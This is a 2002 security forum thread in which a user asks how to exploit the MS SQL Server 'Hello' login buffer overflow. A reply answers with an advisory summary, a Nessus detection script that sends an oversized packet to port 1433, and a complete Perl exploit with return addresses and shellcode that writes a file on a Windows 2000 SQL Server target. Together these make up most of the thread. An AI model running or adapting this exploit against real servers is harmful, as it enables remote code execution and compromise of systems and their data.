• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

MS SQL Hello Overflow

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses

View previous topic :: View next topic  
Author Message
RichieRich
Just Arrived
Just Arrived


Joined: 10 Dec 2002
Posts: 0


Offline

PostPosted: Tue Dec 10, 2002 7:16 am    Post subject: MS SQL Hello Overflow Reply with quote

Does anyone know how to exploit the MS SQL Hello buffer overflow? Any Information would be greatly appreciated. Very Happy
Back to top
View user's profile Send private message
ShaolinTiger
Forum Fanatic
Forum Fanatic


Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia

Offline

PostPosted: Tue Dec 10, 2002 12:10 pm    Post subject: Reply with quote

Versions Affected:

Microsoft SQL Server 7.0
Microsoft Data Engine (MSDE) 1.0
Microsoft SQL Server 2000
Microsoft Desktop Engine (MSDE) 2000

Scope:

The first vulnerability concerns the possibility of overwriting memory by sending a specially crafted login request to the SQL Server (the so-called ďHello BugĒ). This could result in the execution of arbitrary code. Entercept protects against code execution as a result of buffer overflows.

The second vulnerability is a buffer overflow condition in one of the Database Console Commands (DBCC) and exploitation could lead to arbitrary code execution. Enterceptís Database Edition prevents against exploitation of several buffer overflow conditions in the DBCCs by blocking access to these commands. In addition, Entercept Standard Editionís buffer overflow protection prevents code execution as a result of buffer overflows.

The third vulnerability is found in the SQL Agent, which can receive and execute jobs submitted by a database user. The privileges that come with running jobs by the SQL Agent may be higher than those of the database user that submitted them. Enterceptís Database Edition blocks access to the job scheduling stored procedures and thus, prevents this elevation of privileges.

Nessus also has this one in it's database.

Code:
##
#
# this script tests for the "You had me at hello" overflow
# in MSSQL (tcp/1433)
# Copyright Dave Aitel (2002)
# Bug found by: Dave Aitel (2002)
#
##
#TODO:
#techically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!


if(description)
{
 script_id(11067);
# script_cve_id("CVE-2000-0402");
 script_version ("$Revision: 0.1 $");
 name["english"] = "Microsoft SQL Server Hello Overflow";
 script_name(english:name["english"]);
 
 desc["english"] = "
The remote MS SQL server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";

 script_description(english:desc["english"]);
 
 summary["english"] = "Microsoft SQL Server Hello Overflow";
 script_summary(english:summary["english"]);
 
 script_category(ACT_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel");
 family["english"] = "Windows";
 script_family(english:family["english"]);
 script_require_ports(1433);
 exit(0);
}

#
# The script code starts here
#
#taken from mssql.spk
pkt_hdr = raw_string(
0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00  ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b
,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03  ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02
,0x10 ,0x00 ,0x00 ,0x00
);

#taken from mssql.spk
pkt_tail = raw_string (
0x00 ,0x24 ,0x01 ,0x00 ,0x00
);

#techically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!
port = 1433;
found = 0;
report = "The SQL Server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";


if(get_port_state(port))
{
    soc = open_sock_tcp(port);

    if(soc)
    {
       #uncomment this to see what normally happens
        #attack_string="MSSQLServer";
   #uncomment next line to actually test for overflow
   attack_string=crap(560);
        # this creates a variable called sql_packet
   sql_packet = pkt_hdr+attack_string+pkt_tail;
   send(socket:soc, data:sql_packet);

       r  = recv(socket:soc, length:4096);
       close(soc);
   #display ("Result:",r,"\n");
      if(!r)
       {
       # display("Security Hole in MSSQL\n");
            security_hole(port:port, data:report);
       }
    }
}


And below is a simple exploit that writes a file to the target machine:

Code:
#!/usr/local/bin/perl

#-----------------------------------------------------------
#   Exploit will create file '\scan_sql2k_bo2.'
#
# SQL Server 2000 'Hello Bug' for Win2k(SP2)
#    by sk@scan-associates.net & spoonfork
#
# Bug found by
#   Dave Aitel
#   http://online.securityfocus.com/archive/1/286311/2002-08-02/2002-08-08/0
#
# http://www.scan-associates.net/
# greetz to:    scan clan, especially to tynon, pokleyzz, and wyse
#      Alphaque and L33tdawg.
#      and Dave Aitel for finding and not releasing the exploit :>
# original and most up-to-date of dis file can be found in
#   http://www.scan-associates.net/papers/sql2kx2.txt
#-----------------------------------------------------------
use Socket;


$connect_host = $ARGV[0];

if (!defined($connect_host)) {
   print "Usage: $0 <target>\n";
   exit 255;
}

$port = 1433;
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);

$bug =  "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b";
$bug .=  "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02";
$bug .=  "\x10\x00\x00\x00";
$bug2 =  "A" x 528;
$bug .=  $bug2;
$bug .=  "\x6b\xd0\xc0\x40";
$bug .=  "AAAA";
$bug .=  "\x83\x91\xe8\x77";
$bug .=  "\x50\x1e\xd0\x42";
$bug .=  "\x0b\x03\x0f\x02";
$bug .=  "DDDD";
$bug .=  "\x50\x1e\xd0\x42";
$bug .=  "\x50\x1e\xd0\x42";
$bug3 =  "\x90" x 88;
$bug .=  $bug3;
$bug .=  "\x8B\xF1\x33\xC0\xC7\x06\x5C\x73\x63\x61\xC7\x46\x04\x6E\x5F\x73";
$bug .=  "\x71\xC7\x46\x08\x6C\x32\x6B\x5F\xC7\x46\x0C\x62\x6F\x32\x2E\x88";
$bug .=  "\x46\x10\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\xB8\x6C\xC2";
$bug .=  "\x01\x78\xFF\xD0\xB8\xC7\x3E\x01\x78\xFF\xD0";

$bug .=  "\x00\x24\x01\x00\x00";

print SOCKET $bug;
Back to top
View user's profile Send private message Visit poster's website
chet
Just Arrived
Just Arrived


Joined: 07 Oct 2002
Posts: 0
Location: Nottingham, UK

Offline

PostPosted: Sat Jan 25, 2003 1:43 pm    Post subject: Reply with quote

They are going mad over in the states

Yep going mad in the states, huge Ddos attack

http://webhostingtalk.com/showthread.php?s=c8b022fd63798fcc6524175a8d4933e2&threadid=107128

And wow this is getting busy,
Back to top
View user's profile Send private message
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register